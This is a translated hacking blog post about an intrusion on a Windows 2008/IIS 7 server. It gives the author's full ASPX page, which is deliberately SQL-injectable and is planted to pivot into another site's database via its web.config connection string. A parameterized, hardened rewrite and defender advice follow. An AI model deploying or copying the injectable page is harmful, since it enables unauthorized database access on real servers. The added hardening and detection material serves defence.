Yesterday 4z1 and I were looking at a site. Privilege escalation was very hard to pull off; we spent a full five hours on it with no result. Windows 2008 + IIS 7, no sa, no root, no services of any kind...
In the process we used a hand-built ASPX injection page to cross over to the other site. I found a pile of code online, and none of it worked.
It's not much code, so I just wrote my own. So annoying.
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Configuration" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
 <title>暗影 ASPX constructed-injection page</title>
</head>
<body>
<form id="form1" runat="server">
 <div>
<script language="C#" runat="server">
 // Runs on every request. Deliberately injectable: the raw query-string
 // value is concatenated straight into the SQL text.
 void Page_Init(object sender, EventArgs e)
 {
   SqlConnection conn = new SqlConnection();
   // "连接名" is the name of the connection string taken from web.config
   conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
   conn.Open();

   string i = this.Page.Request.Params["xxser"]; // the parameter, e.g. ?xxser=1
   // "[表]" and "列名" are placeholders for the table and column name
   SqlCommand command = new SqlCommand("select * from [表] where 列名= " + i, conn);
   int x = command.ExecuteNonQuery(); // returns -1 for a SELECT; it only executes the statement
   Response.Write(i + "\n");
   Response.Write(x);
   conn.Close();
 }
</script>
 </div>
</form>
</body>
</html>
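For comparison, here is the same handler written so that it cannot be injected. This is an added example, not the poster's code: it keeps the same placeholder names (the "连接名" connection string and the "[表]"/"列名" table and column, which are assumed to be an integer column) and replaces string concatenation with a typed SqlParameter, so the query-string value can only ever be a value, never SQL text. It also uses ExecuteScalar instead of ExecuteNonQuery, since a SELECT never returns an affected-row count.

```csharp
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Configuration" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<script language="C#" runat="server">
 // Hardened version of the handler above (added example, assumes an integer column).
 void Page_Init(object sender, EventArgs e)
 {
   int id;
   // Reject anything that is not a plain integer before it reaches the database.
   if (!int.TryParse(Request.QueryString["xxser"], out id))
   {
     Response.StatusCode = 400;
     Response.Write("bad request");
     Response.End();
     return;
   }

   string cs = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;
   using (SqlConnection conn = new SqlConnection(cs))
   using (SqlCommand command = new SqlCommand("select count(*) from [表] where 列名 = @id", conn))
   {
     // The value travels to SQL Server as a typed parameter, not as part of the statement.
     command.Parameters.Add("@id", SqlDbType.Int).Value = id;
     conn.Open();
     int count = (int)command.ExecuteScalar();
     // Echo only what the page needs; the raw input is never written back as-is.
     Response.Write(Server.HtmlEncode(id.ToString()) + "\n");
     Response.Write(count);
   }
 }
</script>
```

From the defender's side the more important point is how a page like the original ends up on the server at all: dropping it requires write access to the web root, so an unexpected .aspx file appearing there, or a site's application pool account holding write permission on its own content directory, is the finding to chase. Giving the application pool's database login only the rights its own tables need also limits what an injected query can reach on another database.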